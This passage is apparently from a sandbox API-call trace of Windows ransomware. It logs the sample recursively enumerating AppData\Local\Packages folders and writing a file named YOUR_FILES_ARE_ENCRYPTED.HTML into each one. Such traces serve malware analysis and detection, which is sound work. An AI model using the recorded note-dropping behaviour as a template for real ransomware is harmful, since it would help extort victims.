returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\INetCache" [0121.908] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\INetCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\INetCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\INetCache\\*" [0121.908] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\INetCache\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x42cc0372, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42cc0372, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42cc0372, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3161238, dwReserved1=0x3161700, cFileName=".", cAlternateFileName="")) returned 0x626638 [0121.908] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x42cc0372, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42cc0372, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42cc0372, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3161238, dwReserved1=0x3161700, cFileName="..", cAlternateFileName="")) returned 1 [0121.908] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x42cc0372, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42cc0372, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42cc0372, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3161238, dwReserved1=0x3161700, cFileName="..", cAlternateFileName="")) returned 0 [0121.908] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0121.908] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 109 [0121.908] GetProcessHeap () returned 0x600000 [0121.908] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0121.908] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\windows_ie_ac_001\\ac\\inetcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0121.909] WriteFile (in: hFile=0x31c, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0121.910] CloseHandle (hObject=0x31c) returned 1 [0121.910] GetProcessHeap () returned 0x600000 [0121.910] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0121.910] GetProcessHeap () returned 0x600000 [0121.910] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0121.910] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x42cc0372, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42cc0372, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42cc0372, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x316177e, dwReserved1=0x31616f8, cFileName="INetCookies", cAlternateFileName="INETCO~1")) returned 1 [0121.910] StrStrIW (lpFirst="INetCookies", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.910] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\INetCookies") returned 81 [0121.910] GetProcessHeap () returned 0x600000 [0121.910] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0121.910] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\INetCookies" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\INetCookies") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\INetCookies" [0121.910] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\INetCookies", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\INetCookies\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\INetCookies\\*" [0121.911] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\INetCookies\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x42cc0372, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42cc0372, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42cc0372, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3161238, dwReserved1=0x3161700, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0121.911] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x42cc0372, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42cc0372, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42cc0372, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3161238, dwReserved1=0x3161700, cFileName="..", cAlternateFileName="")) returned 1 [0121.911] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x42cc0372, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42cc0372, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42cc0372, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3161238, dwReserved1=0x3161700, cFileName="..", cAlternateFileName="")) returned 0 [0121.911] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0121.911] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 111 [0121.911] GetProcessHeap () returned 0x600000 [0121.911] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0121.911] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\windows_ie_ac_001\\ac\\inetcookies\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0121.912] WriteFile (in: hFile=0x31c, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0121.913] CloseHandle (hObject=0x31c) returned 1 [0121.913] GetProcessHeap () returned 0x600000 [0121.913] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0121.913] GetProcessHeap () returned 0x600000 [0121.913] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0121.913] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x42cc0372, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42cc0372, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42cc0372, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x316177e, dwReserved1=0x31616f8, cFileName="INetHistory", cAlternateFileName="INETHI~1")) returned 1 [0121.913] StrStrIW (lpFirst="INetHistory", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.913] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\INetHistory") returned 81 [0121.913] GetProcessHeap () returned 0x600000 [0121.913] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0121.913] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\INetHistory" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\INetHistory") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\INetHistory" [0121.913] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\INetHistory", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\INetHistory\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\INetHistory\\*" [0121.913] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\INetHistory\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x42cc0372, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42cc0372, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42cc0372, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3161238, dwReserved1=0x3161700, cFileName=".", cAlternateFileName="")) returned 0x626978 [0121.913] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x42cc0372, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42cc0372, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42cc0372, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3161238, dwReserved1=0x3161700, cFileName="..", cAlternateFileName="")) returned 1 [0121.913] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x42cc0372, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42cc0372, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42cc0372, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3161238, dwReserved1=0x3161700, cFileName="..", cAlternateFileName="")) returned 0 [0121.913] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0121.914] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 111 [0121.914] GetProcessHeap () returned 0x600000 [0121.914] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0121.914] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\windows_ie_ac_001\\ac\\inethistory\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0121.920] WriteFile (in: hFile=0x31c, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0121.922] CloseHandle (hObject=0x31c) returned 1 [0121.922] GetProcessHeap () returned 0x600000 [0121.922] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0121.922] GetProcessHeap () returned 0x600000 [0121.922] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0121.922] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42cc0372, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42cc0372, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42cc0372, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x316177e, dwReserved1=0x31616f8, cFileName="Temp", cAlternateFileName="")) returned 1 [0121.922] StrStrIW (lpFirst="Temp", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0121.923] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\Temp") returned 74 [0121.923] GetProcessHeap () returned 0x600000 [0121.923] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0121.923] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\Temp" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\Temp") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\Temp" [0121.924] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\Temp", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\Temp\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\Temp\\*" [0121.924] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\Temp\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42cc0372, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42cc0372, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42cc0372, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3161238, dwReserved1=0x3161700, cFileName=".", cAlternateFileName="")) returned 0x626638 [0121.924] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42cc0372, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42cc0372, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42cc0372, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3161238, dwReserved1=0x3161700, cFileName="..", cAlternateFileName="")) returned 1 [0121.924] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42cc0372, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42cc0372, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42cc0372, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3161238, dwReserved1=0x3161700, cFileName="..", cAlternateFileName="")) returned 0 [0121.924] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0121.924] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0121.924] GetProcessHeap () returned 0x600000 [0121.924] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0121.924] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\windows_ie_ac_001\\ac\\temp\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0121.925] WriteFile (in: hFile=0x31c, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0121.926] CloseHandle (hObject=0x31c) returned 1 [0121.926] GetProcessHeap () returned 0x600000 [0121.927] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0121.927] GetProcessHeap () returned 0x600000 [0121.927] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0121.927] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42cc0372, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42cc0372, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42cc0372, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x316177e, dwReserved1=0x31616f8, cFileName="Temp", cAlternateFileName="")) returned 0 [0121.927] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0121.927] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 99 [0121.927] GetProcessHeap () returned 0x600000 [0121.927] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3153030 [0121.927] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows_ie_ac_001\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\windows_ie_ac_001\\ac\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0121.928] WriteFile (in: hFile=0x338, lpBuffer=0x3153030*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3153030*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0121.929] CloseHandle (hObject=0x338) returned 1 [0121.929] GetProcessHeap () returned 0x600000 [0121.929] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3153030 | out: hHeap=0x600000) returned 1 [0121.929] GetProcessHeap () returned 0x600000 [0121.929] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0121.930] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x42cc0372, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42cc0372, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42cc0372, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AC", cAlternateFileName="")) returned 0 [0121.930] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0121.930] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows_ie_ac_001\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 96 [0121.930] GetProcessHeap () returned 0x600000 [0121.930] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3153030 [0121.930] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\windows_ie_ac_001\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\windows_ie_ac_001\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0121.931] WriteFile (in: hFile=0x214, lpBuffer=0x3153030*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x3153030*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0121.932] CloseHandle (hObject=0x214) returned 1 [0121.932] GetProcessHeap () returned 0x600000 [0121.932] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3153030 | out: hHeap=0x600000) returned 1 [0121.932] GetProcessHeap () returned 0x600000 [0121.932] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f4fc8 | out: hHeap=0x600000) returned 1 [0121.932] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42cc0372, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x42cc0372, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x42cc0372, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="windows_ie_ac_001", cAlternateFileName="WINDOW~1")) returned 0 [0121.932] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0121.932] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 78 [0121.932] GetProcessHeap () returned 0x600000 [0121.932] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3153030 [0121.932] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0121.933] WriteFile (in: hFile=0x30c, lpBuffer=0x3153030*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19eab8, lpOverlapped=0x0 | out: lpBuffer=0x3153030*, lpNumberOfBytesWritten=0x19eab8*=0x3c00, lpOverlapped=0x0) returned 1 [0121.934] CloseHandle (hObject=0x30c) returned 1 [0121.934] GetProcessHeap () returned 0x600000 [0121.934] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3153030 | out: hHeap=0x600000) returned 1 [0121.934] GetProcessHeap () returned 0x600000 [0121.934] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6c47b8 | out: hHeap=0x600000) returned 1 [0121.935] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x73f4dcd0, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x73f4dcd0, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x73f4dcd0, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x6265c0, cFileName="PeerDistRepub", cAlternateFileName="PEERDI~1")) returned 1 [0121.935] StrStrIW 